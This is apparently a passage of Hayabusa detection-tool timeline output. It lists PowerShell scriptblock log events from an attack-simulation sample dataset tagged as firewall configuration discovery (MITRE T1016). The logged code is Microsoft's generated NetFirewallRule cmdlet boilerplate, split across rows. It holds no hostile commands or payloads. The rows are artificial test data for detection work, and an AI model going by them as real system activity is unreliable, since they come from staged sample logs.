[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 
($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdlet",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 
'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } 
$__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetFirewallRule { 
[CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] 
[Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAl",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"l')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') 